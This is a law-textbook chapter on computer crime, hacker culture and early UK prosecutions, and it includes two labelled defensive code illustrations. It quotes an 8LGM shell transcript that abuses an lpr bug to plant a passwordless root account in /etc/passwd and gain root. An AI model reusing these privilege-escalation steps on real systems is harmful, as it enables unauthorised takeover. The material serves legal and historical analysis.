Chapter One

Crime and the Computer


Introduction

Articles, books and even Hollywood movies have explored the world of the computer hacker. Whether the hacker is regarded as a modern-day equivalent of Robin Hood or of Attila the Hun, the criminal consequences of computer-related conduct increasingly constitute the subject of both popular and legal debate.

In many instances, the fact of a computer's involvement in some scheme of criminal conduct raises no novel legal issues. Where the computer is involved in some scheme of fraud, there is little doubt that some form of theft-related offence will be committed at the time when the perpetrator acquires possession of the funds in question. There may be dispute as to when an offence is committed. Given the speed and potential scale of electronic fund transfers - one oft-quoted estimate has it that the United Kingdom's currency reserves could be transferred abroad in 15 minutes - this is a matter of considerable practical significance, not least in that there may be a jurisdictional issue where the proceeds of a fraud are realised outwith the United Kingdom[1].

The focus of the present work will be on those areas where the question whether conduct is criminal is open to doubt. As with data protection, concerns at the adequacy of existing legal provisions have led to the enactment of computer-specific legislation, in this case in the form of the Computer Misuse Act 1990. Again, therefore, a major element of the work must involve consideration of how effective this legislation is likely to prove as a response to the challenges facing the law.


What is a 'hacker'?

Articles written about "hackers" and the "computer underground" are invariably senseless, inaccurate, and sensationalistic. The writers of said articles have a strong preconceived notion, every "fact" they collect either reinforces that notion, is twisted to reinforce that notion, or is discarded, and they pass the resulting tripe onto readers who don't know enough about the subject to do anything but believe the report.[2]

The media depiction of a hacker tends to be that of a male teenager in a greasy T-shirt and torn jeans who spends 27 hours slumped over a terminal, eyes gazing fixedly at the green glow of the VDU monitor. Before his very eyes banks, military installations, universities, companies and financial institutions fall before his relentless onslaught. Nowhere is safe, no one can keep him out, no one knows of the scale of the threat, the silent deadly menace stalks the networks. A juvenile prodigy who programmed from the age of three, the hacker possesses boundless, unsurpassable knowledge of every operating system and is endowed with a remarkable natural talent for programming. Fluent in all languages, he can write special programs to overcome all obstacles and can cover his electronic traces to leave no sign of intrusion. The hacker has no friends, likes heavy metal music, has never had a girlfriend and gains all sense of self worth through pounding the keyboards and controlling the world's networks.

Possibly this is itself a stereotype of a media stereotype and is over-simplistic, but such imagery is widely scattered throughout much 'hacker' reporting. The UK hacker, Neil Woods, who was arrested and charged under the Computer Misuse Act in 1991, although admitting to having hacked into many computers, complained that the mere mention of the word 'hacking' appeared to generate an atmosphere of exaggerated fear and hysteria about what hackers were capable of doing:

There were a lot of incredible stories in the press, such as we delayed the gulf war because we gained access to a met.office computer, and they thought we were a foreign power - the computer was supposedly supplying forecasts for the gulf area at the time ... don't believe most of what you read about us, a lot of it is factually incorrect, from our ages up to what we were alleged to have hacked. I don't blame journalists for some of it though, as there was a lot of garbage said in court.[3]

Genuine uncertainty about what a hacker is provokes much of this kind of reaction. Many people assume that hackers are necessarily possessed of strange and sinister talents which enable them to gain free access to the world's computers and that often their motives are malicious and their activities dangerous. In the Net News[4] group, Alt.Hackers, Jef Poskanzer regularly warns readers what the news group is really all about.

What's a hacker? This is kind of like asking a Zen Buddhist "What is Zen?", or asking Louis Armstrong "What is jazz?" ...There was a period in the '80s when the media used "hacker" to mean someone who breaks into computer systems. They were using the word incorrectly. Some people who came of age during that period believed the media's incorrect definition, applied it to themselves, and now think they are some sort of glorious outlaw hacker. These people are sadly misguided. Perhaps someday they will figure out what hacking is really about. Perhaps reading this news group will help ...

Hacking is a generic expression in the computing world and can be applied in many contexts. The New Hacker's Dictionary[5] defines hacking in various ways:

  1. A person who enjoys exploring the details of programmable systems and how to stretch their capabilities, as opposed to most users, who prefer to learn only the minimum necessary.
  2. One who programs enthusiastically (even obsessively)...
  3. A person good at programming quickly
  4. An expert in a particular language or operating system, i.e. a UNIX® hacker
  5. One who enjoys the intellectual challenge of overcoming or circumventing limitations
  6. A malicious meddler who tries to discover sensitive information by poking around

Generally speaking, at least in strictly computing terms, a hack is a quick fix or clever solution to a restriction. A 'hack' is a temporary if ingenious fix or 'make do' rather than an attack on a system. Tricking a dumb machine into performing an unintended task is the predominant characteristic of a 'hack'; even well known simple tricks such as sticking sellotape over pre-recorded tapes to enable reuse as a 'blank' tape can be described as 'hacks'.


The History of 'Hacking'

Hacking, as most people are dimly aware, predates the computing age. It began in the golden days of phone phreaking, in which the telecommunications system of America was subjected to constant misuse by those seeking free calls and unpaid-for services. The basic technique was to simulate valid system sounds by other means (including a whistle given away free in breakfast cereal which, it was discovered, could emit a high-pitched shriek exactly like that of a tone which gave full operator's privileges). The aims of phone phreaking may seem straightforward: avoidance of payment was a major incentive. However, even back in those days, motives other than the purely financial could be detected. 'Phreakers' enjoyed the thrill of the game, the mastery over the machine, outwitting 'the system' and generally asserting intellectual superiority.

Computer 'hacking' retains many of these principles and was a natural progression from 'phreaking' phones, as networked computers even today are simply computers hooked up via telecommunication lines, whether by traditional analogue telephone lines, the latest ISDN lines or by satellite. The 'hacker' Net News group, alt.2600, which continues its existence on the Internet, takes its name from the 2600 hertz that enabled phone phreaks to access the phone system.


Phrack: The Hacking Trade Magazine

Phrack is an electronic magazine which attempts to be an unofficial trade magazine for 'hackers'/'crackers'. Founded in the early 1980's, it has enjoyed a colourful and eventful history and continues in publication today, although not in the same editorial hands. The journal shows all the hallmarks of a juvenile and amateurish enterprise and lacks any coherent structure. It consists of telecommunications information (Phrack = Phreaking/Hacking) and detailed information on operating systems security loopholes (they do not claim to be doing this to benefit system owners!). Issues of Phrack which appeared in the 1980's have a strong 'dark side cracking' edge to them in their descriptions of system breaking and the abuse of the telecommunications system. In its 1990's incarnation, it has adopted a slightly more restrained tone and could perhaps pass as a system security discussion group. The editors assert that they have always avoided publishing anything of an overtly illegal nature.

Members of the Phrack editorial board were at one time associated with the 'Legion of Doom', a hacker group which operated in the United States in the late 1980's. The group's wide ranging activities included diversion of telephone networks, copying proprietary information from companies and distributing 'hacking' tutorials. In 1990, two 'Legion of Doom' members were prosecuted under the American Wire Fraud and Computer Fraud and Abuse Statutes for their alleged misappropriation of confidential information relating to the operation of the emergency 911 telephone service. During the trial, the semantics of the term 'hacking' emerged as an issue. One 'Legion of Doom' member objected to being described in court as a 'hacker' as he felt such a term was 'unnecessary and prejudicial'[6]. The court however found that such a term was acceptable to describe persons who gain unauthorised access to computers. Reference was made to Webster's II New Riverside University Dictionary which defines a hacker as "Slang. One who gains unauthorised, usually non fraudulent access to another's computer system", with the term being taken generally to mean both those who gain unauthorised access and those who enjoy investigating computer operating systems.


Dark Side Hackers or Crackers

Such terms are often used to describe the 'bad' hacker, although the use of 'Star Wars' terminology might be thought still to glamorise and romanticise their activities. The use of such alternative descriptions represents an attempt by non-malicious hackers to distance themselves from the criminal activities of certain notorious hacking/cracking rings. A previous demarcation had attempted to establish use of the term 'worm' to describe the benign sister of the 'virus' (a worm was supposed to be a harmless self-replicating program). However, this linguistic readjustment failed spectacularly when Robert Morris' famous Internet worm created havoc in 1988. The fact that Morris' worm had started life as an apparently innocent creature and had been intended only to demonstrate programming ability and, in the well worn hacker phrase, 'to expose security problems', highlights the difficulties inherent in attempting to distinguish between 'good' and 'bad' 'hackers'.

In some cases, the 'hacker'/'cracker' may not be a programming genius or 'Whizz Kid' but may rather have characteristics in common with that other predominantly male pursuit[7] - trainspotting. This type of 'hacker'/'cracker' accumulates vast quantities of information, which in itself may be unimportant but which can be manipulated to form a whole, which if not larger than the sum of its parts, at least gives its possessor the knowledge necessary to begin 'tweaking' the system. All manner of detail concerning the minutiae of operating systems is collected with amateurish enthusiasm. Just as the train spotter through exhaustive tabulation of train times may work out an optimum route to avoid ticket collectors, such a hacker may work out a 'route' from unauthorised logger on to root access. Some hacks may be very simple. A recent discussion on the electronic 'hacker' Net News group, alt.2600, concerned the subject of hacking into the computerised legal retrieval service Lexis. For those hoping to reduce Lexis costs, the advice given was disappointing. The best strategy suggested was to stroll into a local university and 'shoulder surf' a password from an unsuspecting user. This tried and tested method remains a favourite for those pursuing the intentionally darker side of 'hacking'. Many other 'hacks' are still almost as quick and easy. During the Winter Olympics, the Net News carried many reports on how journalists had 'hacked' into Tonya Harding's e-mail account simply by using her date of birth. The links between credit card fraud and what is called 'hacking' are well known, yet again the simplest methods are often the best.
Before mail order companies tightened up security on mailing addresses, many such frauds were committed not by a generation of brilliant computer programmers overcoming the system security of credit card company databases, but by opportunists reading certain bulletin boards which posted account details of cards which had been stolen by more conventional means, thus making such information available to anyone with a computer and a modem. Obviously, any institution which relies on the digital transfer of credit, and which stores customer information on networked databases is at risk from the activities of 'hackers' but it is impossible to estimate to what extent skilled computer hackers are exploiting esoteric loopholes of operating systems in order to gain access to account information and to what extent the highways of Cyberspace are simply being used by criminals as a convenient means of communication. Some computer using criminals may only have a working knowledge of computing and networking, others may possess next to none. No one expects a car thief to necessarily know more about a car than how to drive it and possibly a few ingenious tricks on overcoming car security, again probably acquired from a 'friend' rather than worked out from first principles, but few would possess the skills necessary to design and build a car. Many 'hackers' seeking financial gain from Cyberspace may well fall into the 'users' category rather than the designers. However, the opportunities available to those whose skills are of a higher calibre remain extremely lucrative and as use of networks as vehicles for the transportation of an increasing variety of goods and services increases, the stakes can only get higher.


Hacking in the 90's?

THE GOLDEN ERA REBORN

Relive the thrill of the golden era of hacking through our exclusive collection of BBS messages. Our collection contains posts from over 40 of the most popular hack/phreak BBS's of all time.

Experience the birth of the Computer Underground again from your own computer with this collection of original posts from bulletin boards like

*BBS*
*OSUNY*
*PLOVERNET*
*THE LEGION OF DOOM*
*BLACK ICE PRIVATE*
*THE PHOENIX PROJECT*

And many more ...

This ad appeared in an edition of Phrack in March 1993.

Does this suggest that the golden age of 'hacking' has passed already? What can we expect to see take its place? From 'phone phreaking' to 'hacking', what next?

It might be thought that the worst examples of insecure systems belong to the past, to an age when the mere use of a password was expected to provide adequate security and that advances in technology and in security awareness have increased the readiness of system managers to respond to 'hacker' challenges. However, reports of threats to financial and military security are as frequent as ever with even sites which one might have expected to have adopted the best in security measures continuing to experience difficulties.

For seven months the Pentagon has been unable to locate hackers tapping into its unclassified computer system, officials said Thursday. Defense Department officials have known since December that intruders in the United States and abroad have gained access to Pentagon computer files through the Internet and, in some cases, stolen, altered and erased records. But despite a security budget in the "hundreds of millions of dollars," the Pentagon has been unable to close the breach.[8]

Is such activity evidence that Phrack style 'hacking' is still alive and well or is a 90's style of 'hacking' beginning to emerge? Are young 'hackers', perhaps following the distorted image of the 'media hacker', reaping where others have sown? Are latter day 'hackers' perhaps tempted by the fruits of 'hacking' rather than by the intellectual challenge? Computer networks now offer an increasing number of goods and services and as computer users turn into consumers, it is probable that rather than breaking into operating systems to explore the intricacies of system privileges, the 'hackers' of the future will be motivated by the desire to acquire the traffic on the 'Information Super Highway'. As computers themselves become high level consumer goods rather than low level technical 'gizmos', there will be more incentive to abuse the 'network' that operates in what is sometimes referred to as 'Cyberspace' rather than to target individual computers.


Packet Sniffing, Magic Cookies and Boxing

The lexicography of hacking has expanded since the days of Trojan Horses, Logic Bombs and Trapdoors. The names may have changed along with the technology but have the aims and motivations of 'hackers' changed to any great extent? To answer this question, we must look at the emergence of an electronic community known as the 'Internet'.

The Internet is a complex web of interconnected sites whose communication is made possible by adherence to a shared protocol. Use of the Internet has multiplied exponentially with a current membership of approximately 20 million people, 2.5 million computers and 30,000 networks. In the good old days, use of the Internet was limited to academic and research institutions whose concerns on system security were minimal; after all, the primary purpose of such a network was the open exchange of information. Data was sent from site to site, often via numerous intermediary sites, in small chunks known as packets. The packets were then reassembled at the destination site in order to rebuild the complete message. As the focus shifts from individual sites to the network itself, such packets are extremely interesting and valuable to those seeking more than their fair share of network time and resources.

The number of Internet sites compromised by the ongoing series of network monitoring (sniffing) attacks continues to increase. The number of accounts compromised world-wide is now estimated to exceed 100,000. This series of attacks represents the most serious Internet threat in its history.[9]

Internet break-ins have been a national news story lately, with reports that unknown intruders have purloined more than 10,000 passwords in a burst of activity during recent months. The Federal Bureau of Investigation is investigating, since so many "federal-interest computers" are attached to the wide-open Internet and since it is a crime to possess and use other peoples' passwords[10]

Packet Sniffing is the latest piece of jargon to emerge in Cyberspace: 'hackers' are now attacking networks themselves rather than targeting specific sites. 'Packet Sniffer' programs are installed which monitor traffic at public access Internet sites. User names and passwords can be winnowed out of the electronic chaff to yield valuable access rights. Such techniques can subvert all conventional attempts to secure passwords, as even encrypted passwords may simply be 'replayed' to the intended host site; only 'use once and dispose' passwords within firewalls[11] can remain safe from the packet sniffers. Such activities may be carried out by system administrators attempting to assess site security, again blurring the distinction between 'hacking' or 'cracking' and legitimate system management.

'Magic Cookies', another addition to the hacker's lexicography, are locations or addresses on the Internet. Many 'Magic Cookies' are public domain in any case, as on a gopher server[12] whose purpose is to provide a browsing facility for public domain information at that site. However, some gopher servers may be open to abuse in that their actual domain may extend far beyond the menu, allowing illicit 'Magic Cookies' to be passed to them requesting information not intended for public access.[13]
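
The replay point made above about packet sniffing can be shown in a few lines. The following is an added illustration, not part of the original text: it compares a login that sends the same encrypted (here, hashed) password every time with a 'use once and dispose' scheme. The one-time scheme is built as a hash chain, which is an assumption, since the text names no particular scheme; all class names, the password and the seed are constructed for the example.

```python
import hashlib
import hmac


def h(data: bytes) -> bytes:
    """One-way function applied to a credential before it crosses the network."""
    return hashlib.sha256(data).digest()


def chain(seed: bytes, n: int) -> bytes:
    """Apply h() to seed n times: h(h(...h(seed)...))."""
    value = seed
    for _ in range(n):
        value = h(value)
    return value


class StaticHashServer:
    """Accepts the same hashed password on every login."""

    def __init__(self, password: bytes):
        self._expected = h(password)

    def login(self, wire_token: bytes) -> bool:
        return hmac.compare_digest(wire_token, self._expected)


class OneTimeServer:
    """Stores h^n(seed); every accepted token becomes the next reference."""

    def __init__(self, seed: bytes, n: int):
        self._reference = chain(seed, n)
        self.remaining = n

    def login(self, wire_token: bytes) -> bool:
        if self.remaining == 0:
            return False  # chain used up: the user must enrol again
        if not hmac.compare_digest(h(wire_token), self._reference):
            return False
        # The token just used is now worthless: the next login must present
        # its preimage, which cannot be derived from anything seen on the wire.
        self._reference = wire_token
        self.remaining -= 1
        return True


class OneTimeClient:
    """Walks the chain backwards: h^(n-1)(seed), then h^(n-2)(seed), ..."""

    def __init__(self, seed: bytes, n: int):
        self._seed = seed
        self._n = n

    def next_token(self) -> bytes:
        if self._n == 0:
            raise RuntimeError("one-time password chain exhausted")
        self._n -= 1
        return chain(self._seed, self._n)


def run_exchange() -> dict:
    """Log in under both schemes while a monitor records the wire traffic."""
    captured = []  # everything a sniffer on the path would have recorded
    results = {}

    # Scheme 1: the password is hashed, but the same bytes are sent each time.
    static = StaticHashServer(b"constructed-password")
    token = h(b"constructed-password")
    captured.append(token)
    results["static_first"] = static.login(token)
    results["static_replay"] = static.login(captured[-1])

    # Scheme 2: 'use once and dispose' tokens from a hash chain of length 3.
    seed = b"constructed-seed"
    server = OneTimeServer(seed, 3)
    client = OneTimeClient(seed, 3)
    token = client.next_token()
    captured.append(token)
    results["otp_first"] = server.login(token)
    results["otp_replay"] = server.login(captured[-1])
    results["otp_next"] = server.login(client.next_token())
    results["otp_remaining"] = server.remaining
    return results


if __name__ == "__main__":
    for name, value in run_exchange().items():
        print(f"{name}: {value}")
```

The recorded token is accepted a second time under the first scheme and rejected under the second, while the legitimate user's next token still works.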

The telecommunications network is still a target of contemporary hackers and indeed is estimated to be one of the fastest growing forms of network abuse, although as always precise figures are difficult to gauge, with estimates ranging from millions to billions of pounds each year. The incentives are lucrative: long distance calls are sold on to third parties, generating substantial revenues for the latter day phone phreakers. Methods vary from simple 'finger hacking', that is dialling at random until gold or an access code is struck, to manipulation of programmable chips on cellular phones. The 'phreaking' community is now no longer confined to the use of 'blue boxes', devices which generated the necessary 2600 hertz. Phone system hackers can now choose from a variety of colour box devices - Aqua, Beige, Black, Blotto, Brown, Bud, Busy, Chartreuse, Cheese, Clear, Crimson, Gold, Jack, Neon, Paisley, Pandora's, Pearl, Red, Scarlet, Silver, Tron and Yellow. All these boxes carry out specific hacking tasks; for example, a pearl box is defined as:

a box that may substitute for many boxes which produce tones in hertz. The Pearl Box when operated correctly can produce tones from 1-9999hz. As you can see, 2600, 1633, 1336 and other crucial tones are obviously in its sound spectrum[14]


System Administrators or Hackers?

The introduction of World Wide Web[15] browsing software to the Internet[16] has heightened the profile of 'hacker' oriented information. No longer hidden away on secret bulletin boards requiring aspiring 'hackers' to hunt for their numbers, pages such as the following excerpt can be readily located:

CLM Security Page

Security stuff: FTP Sites and file links:

News groups such as alt.2600, alt.hackers, alt.security, comp.security.unix (a small selection of system security/hacker oriented groups) regularly trade the latest discoveries and there are also numerous FTP[18] sites which carry backlogs of such information.

The Internet Underground, the latest addition to the World Wide Web collection of hacking information, begins with the following words:

Disclaimer: This page is provided for informational sake only. Don't do anything illegal. I don't.

Others may wonder why such information is posted to the Internet at all. Who is using such information and why? Are they all conscientious system administrators honing their anti-hacking techniques or are they aspiring hackers looking for a nursery school environment to begin learning the tricks of the trade? The answer may lie in exploring what is sometimes referred to as the 'hacker ethic'[19]:

The Hacker Ethic

  1. The belief that information sharing is a powerful positive good and that it is an ethical duty of hackers to share their expertise by writing free software and facilitating access to information and to computing resources wherever possible
  2. The belief that system cracking for fun and exploitation is ethically OK as long as the cracker commits no theft, vandalism or breach of confidentiality

The UK based group, 8LGM (8 Legged Groove Machine), probably come within the second definition, although they themselves would argue that publicising system flaws is their only motivation. 8LGM are a self-appointed Internet security team who post information to Internet news groups on security holes along with advice on how to exploit them. Their argument is that this is the best way to alert system managers and that overall, improved security will result. Others argue that 8LGM deliberately post their articles at weekends, and that many systems are compromised before system managers arrive for work on Monday mornings. In addition to this, many smaller sites continue to run old versions of the operating systems and continue to suffer even when 'known weaknesses' are fixed. The speed and the frequency with which such 'weaknesses' are publicised requires system managers to spend a great deal of time keeping in touch with the latest 'hacks'. This may explain the noticeable crossover between discussion of hacking and discussion of system security.

Example of an 8LGM post

Make copies of /etc/passwd and /etc/group, and modify them:

> % id
uid=97(8lgm) gid=97(8lgm) groups=97(8lgm)
> % cp /etc/passwd /tmp/passwd
> % ex /tmp/passwd
/tmp/passwd: unmodified: line 42
> :a
> 8lgmroot::0:0:Test account for lpr bug:/:/bin/csh
> .
> :wq
/tmp/passwd: 43 lines, 2188 characters.
> % cp /etc/group /tmp
> % ex /tmp/group
/tmp/group: unmodified: line 49
> :/wheel
wheel:*:0:root,operator
> :c
> wheel:*:0:root,operator,8lgm
> .
> :wq
/tmp/group: 49 lines, 944 characters.

Install our new files:

> % ./lprcp /tmp/group /etc/group
lpr: cannot rename /var/spool/lpd/cfA060testnode
> % ./lprcp /tmp/passwd /etc/passwd
lpr: cannot rename /var/spool/lpd/cfA061testnode

Check it worked:

> % ls -l /etc/passwd /etc/group
-rw-r--r-- 1 8lgm 944 Mar 3 19:56 /etc/group
-rw-r--r-- 1 8lgm 2188 Mar 3 19:59 /etc/passwd
> % head -1 /etc/group
wheel:*:0:root,operator,8lgm
> % grep '^8lgmroot' /etc/passwd
8lgmroot::0:0:Test account for lpr bug:/:/bin/csh

Become root and tidy up:

> % su 8lgmroot
# chown root /etc/passwd /etc/group
# rm -f /tmp/passwd /tmp/group
#

NB This is only a very small excerpt from the necessary code and is an old hack which will not work on 'fixed' UNIX Operating Systems !

These are examples of typical 'hacks' - lines of code which if run on a certain version of UNIX will result in the 'hacker' gaining root privileges, i.e. total control of the system. Hacking of this kind is analogous to chess playing: it requires the ability to think several steps ahead and to mentally view the system or game not as a linear one dimensional structure but as a multi dimensional system with infinite interrelationships. The system administrator's game is to run a secure system; however, with oceans of code, all of which may be open to interesting new uses, it is a challenging task both to keep shipping lanes open for legitimate traffic and to keep out marauders. The strategy of the operating system 'hacker' is to tweak out unforeseen dependencies and to exploit them.
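
From the system administrator's side of that game, the end state shown in the excerpt is easy to check for. The following is an added example, not part of the original text or of the 8LGM post: it audits the contents of passwd and group files for a second UID 0 account, an empty password field and an unexpected member of a GID 0 group, and checks file ownership. The function names are hypothetical; the sample lines reuse the entries quoted in the excerpt, and the root line is constructed.

```python
import os
import stat

# Members the excerpt shows for wheel before modification: "wheel:*:0:root,operator"
BASELINE_GID0_MEMBERS = {"root", "operator"}

# Sample data: the root line is constructed; the other lines are the
# entries quoted in the excerpt.
SAMPLE_PASSWD = (
    "root:*:0:0:System Administrator:/:/bin/csh\n"
    "8lgmroot::0:0:Test account for lpr bug:/:/bin/csh\n"
)
SAMPLE_GROUP = "wheel:*:0:root,operator,8lgm\n"


def _entries(text, field_count):
    """Yield (name, fields) per entry; fields is None when malformed."""
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        ok = len(fields) == field_count and fields[2].isdigit()
        yield fields[0], (fields if ok else None)


def audit_passwd(text):
    """Flag extra superuser accounts and accounts with no password."""
    findings = []
    for name, fields in _entries(text, 7):
        if fields is None:
            findings.append(("malformed-entry", name))
            continue
        if int(fields[2]) == 0 and name != "root":
            findings.append(("extra-uid0-account", name))
        if fields[1] == "":
            # An empty second field means no password is asked for at all.
            findings.append(("empty-password", name))
    return findings


def audit_group(text, allowed=frozenset(BASELINE_GID0_MEMBERS)):
    """Flag members of any GID 0 group that are not in the known baseline."""
    findings = []
    for name, fields in _entries(text, 4):
        if fields is None:
            findings.append(("malformed-entry", name))
            continue
        if int(fields[2]) != 0:
            continue
        for member in filter(None, fields[3].split(",")):
            if member not in allowed:
                findings.append(("unexpected-gid0-member", member))
    return findings


def check_stat(path, uid, mode):
    """Flag a system file that is not root-owned or is writable by others."""
    findings = []
    if uid != 0:
        findings.append(("not-owned-by-root", path))
    if mode & (stat.S_IWGRP | stat.S_IWOTH):
        findings.append(("writable-by-non-owner", path))
    return findings


def audit_file(path):
    """Apply check_stat() to a real file on this machine."""
    st = os.stat(path)
    return check_stat(path, st.st_uid, st.st_mode)


if __name__ == "__main__":
    for finding in audit_passwd(SAMPLE_PASSWD) + audit_group(SAMPLE_GROUP):
        print(finding)
    # uid 97 and mode -rw-r--r-- match the 'id' and 'ls -l' output above.
    for finding in check_stat("/etc/passwd", 97, 0o100644):
        print(finding)
```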

8LGM, although no longer a 'hacker' group in the destructive sense of the word, have a chequered past. Two of their current members are Karl Strickland and Neil Woods who, along with the more famous, 'addicted to hacking' Paul Bedworth, were charged under the Computer Misuse Act in 1991. Many reformed hackers do go on to work as system managers so it is not a particularly surprising career development, but could their activities still be a potential source of danger even if they themselves do not intend any destructive hacking?

Hackers may well not intend to cause harm to the computing system; most, indeed, have great respect for the code of the operating system, but by not only discovering security loopholes but publishing them indiscriminately, they may be aiding the less well intentioned. Such hackers are perhaps motivated by belief in their superior programming ability, a belief that they alone hold the key to system security, that the computer world needs them. The reality may be very different: despite reports suggesting that Robert Morris was a brilliant if misguided programmer, it appears from later analyses[20] that the worm code he produced was sloppy and, although involving some clever tricks, was hardly evidence of either original and ingenious code or superior programming intellect.

What motivates such 'hackers'? Why do they seek to discover holes in security systems when not specifically employed to do so and why do they make the information freely available to the world community via the Internet rather than simply alert system managers? It could also be argued that many system managers, particularly those running small systems, cannot afford to spend time and money implementing an endless series of patches and fixes. House owners would not welcome burglars whose activities required them to change their locks every two or three weeks because their flaws had been widely publicised.

Why do so many hackers believe that their activities are of benefit to system managers? Are their investigations into operating system security motivated by the desire to help or are they publicity seekers anxious to advertise their skills? Even if the latter is the case, does this necessarily imply that such people are dangerous? This may depend on how effective the 'hacking' advice is and to whom it is distributed. A person with legitimate concerns on airport security might, for a publicity stunt, smuggle an unattended package into a departure hall or attempt to check through an unaccompanied package. Sympathy for such a safety campaigner might be reduced if he or she decided to publicise the security loophole on an Internet News group before alerting the airport managers.


Hacking, Cracking or Committing Crime

'Hackers' can probably be divided into three main categories:

Hackers
Programmers, may investigate 'loopholes'. No malicious intent
Crackers
Unwanted nuisances, may not be themselves malicious but may publicise their findings enabling the malicious to attack systems
Others
Those who commit further offences such as credit card fraud and misuse of the telecommunications system.

Some 'hackers' may fit easily into one particular category; others operate in a twilight zone between the categories. Those in the third category are the most obvious threat to an emerging 'Information super highway' which aims to provide an electronic on line 'Aladdin's Cave' to the modern consumer. Much more than 'free' long distance phone calls may become available to the contemporary robbers. Hackers may no longer have to circumvent mail order security when they use stolen credit card accounts; goods and services in electronic form may be diverted in transit and perhaps a variant of a magic cookie could be used to persuade e-mail order catalogues to yield up their wares. Network abuse may provide opportunities for those who would not have considered conventional theft to commit a more anonymous and invisible form of crime. Most people in the first two categories would not go on to use their knowledge in this way but their eager desire to communicate their findings to a wider world community may well provide starting blocks for the less well intentioned. It may well be argued that genuine concerns on system security do not need to be publicised on the Internet and that system operators could be warned more discreetly. Followers of this practice would argue that their motives are not self publicity but a desire to quickly 'warn' the public of the new danger and that there is no other practical way to contact thousands of system operators. This kind of hacker or cracker might well say that they are not creating the problem, that hacking is going on with or without on line tutorials, but that they are merely aiding system managers in their fight to keep the third category of hackers out.

Many such 'hackers' may be at worst attention seeking, self important nuisances but by publicising their findings in such a free environment as the Internet, the danger is that others will follow, not merely to learn programming tricks in order to enhance their knowledge but to put their knowledge to more practical uses. As the Internet becomes more commercial, its wares may attract more buyers but it may well attract more electronic shoplifters.


Crime in Cyberspace

The term cyberspace was first used by the science fiction author William Gibson in his novel Neuromancer published in 1982 to describe the environment within which computer hackers operate. In the novel, the activity of hacking - securing unauthorised access to the contents of computer systems - is couched in very physical terms. The image is of the hacker overcoming physical security barriers to penetrate into the heart of computer systems and make changes to the physical structure, thereby modifying the operation of the system. When departing, the hacker might even remove and take away elements of the system.

Usage of physical terminology to describe aspects of computer technology is becoming commonplace. Much has been written concerning the concept of virtual reality. This immerses the user in a computer generated world where every "action" taken by the user produces an appropriate feedback affecting all the senses. Virtual reality techniques are currently used by architects to enable users to inspect a building before a brick has been laid. Scientists use virtual reality techniques to "see" how molecular structures are composed and the effect of any changes. For the future, virtual reality techniques are set to move into the entertainment field; the more lurid reports expound upon the possibilities of virtual sex. The promise - or threat - is that we can spend portions of our lives in 'virtual' worlds which will be indistinguishable from the real one save in the removal of any element of physical danger and in the ability of the user to exert a greater degree of control over the outcome of any exploits.

Whilst the use of physical descriptions may represent accurately the sentiments of those involved in the creation and use of computer based technologies, it is much more doubtful how far the criminal law can or should regard simulation as indistinguishable from reality. Although a computer hacker's reach may extend across the world, the hacker never leaves the confines of his or her own keyboard. No matter how exotic an experience in virtual reality might be, the subject never leaves a particular physical location.

Although the computer world may exist only in intangible form, it affects and in some cases controls our physical environment and lives to a very significant extent. The airplane which takes us on holiday will have many of its functions controlled by computer. Conduct which adversely affects the operation of the computer will put the safety of the passengers in very real danger. The financial world is heavily dependent on computers. In our interdependent society it has been estimated that a prolonged failure of the computer system of a major bank in California would affect the economy of the state within 3 days, the United States within a week and the world within 28 days. Fortunately, the matter has not been put to the test.

The term 'computer virus' has entered into popular demonology. The essence of a computer virus is that, like its human equivalent, it may be transmitted from one computer to another. This may occur when an infected disk is transferred between computers. In the event that computers are linked together either in a network or using a telecommunications connection, the virus may also be transmitted electronically. Having infected a computer, the effects of viruses may vary widely. Some viruses are relatively benign. An example is the 'ping-pong' virus whose effects are limited to causing the image of a bouncing ball to move continually across the computer screen. Others such as the 'Friday 13th' and 'Michelangelo' viruses[21] can result in the permanent loss of data stored on the victim computer.

In one of the most notorious instances reported from the United States, a student at Cornell University wrote a computer program referred to as a worm. A worm is a program which replicates itself. Although initially, it may produce few adverse effects, the continuing doubling in size begins to consume larger and larger amounts of the computer system's memory. Ultimately, it will consume the storage space available and, by overwriting material which is already there, will cause the loss of that data. In the case in question, the worm was let loose on the Internet. Within a matter of hours, 6,000 computers were affected across the United States. Almost as worryingly, the student, who ultimately was convicted under the United States Computer Fraud and Abuse Act 1986, did not set out with the intention of causing damage. The incident can best be described as a practical joke which went wrong. A deliberate attempt to maximise the damage could have produced far more serious effects.

One aspect of the reports of the incident reveals a problem which besets efforts to assess the severity of computer related crime. One commentator assessed the cost of the "damage" at $186 million. Other, no less plausible, estimates reduce the cost to a few thousand dollars. It would appear that in some instances, the involvement of the computer in any scheme prompts the addition of several zeros to any assessment of the damage caused. In another case in the United States, a number of computer hackers were charged with theft of data from a telephone company. It was alleged that the value of the data was a very precise $79,499. This was based upon a calculation of all the costs incurred in compiling the data in question. The defence, however, was able to produce in evidence a technical document sold by the telephone company. This contained an even more extensive version of the data allegedly taken from the computer and retailed for $13. In the particular case, the prosecution collapsed at this point but the incident does indicate some of the difficulty which will be encountered whenever the attempt is made to put a value upon intangibles. The problem may not be as significant in Scotland where the offence itself is not dependent upon the value of the property involved.

The incidents recounted above serve as the basis for the first elements of this section. Initial consideration will be given to the extent to which those responsible for the destruction or amendment of data, whether by means of a computer virus or through other techniques, may face criminal sanctions. Next, consideration will be given to the legal response to the actions of computer hackers. In many instances, of course, the two topics will be linked and one of the features of the Law Commission's report[22] prior to the enactment of the Computer Misuse Act was its assertion that fear as to the possible harm resulting from an incident of computer hacking justified the imposition of criminal sanctions even though no actual harm had resulted.


Damage to Data

One of the first reported cases concerning damage to computer data was the English authority of Cox v. Riley (83 Cr App R 54 (1986)). The appellant had been employed to operate a powered saw. Although the device could be used in the traditional manner, it was also equipped with an early form of computer control. Printed circuit cards containing programs could be inserted into a processing unit and would allow the saw to operate automatically, cutting in accordance with pre-determined patterns. There was also a facility referred to as a "program cancellation function". When a particular button was depressed, the programs would be deleted from any card currently in use. The intention was that this facility would be used when the need for a particular pattern had terminated. Deleting the program would allow the card to be re-programmed with a new set of instructions in much the same way as one piece of music may be deleted from a cassette tape and replaced by another recording. Acting without authority and for no valid reason, the appellant deliberately operated the program cancellation function and erased a number of programs.

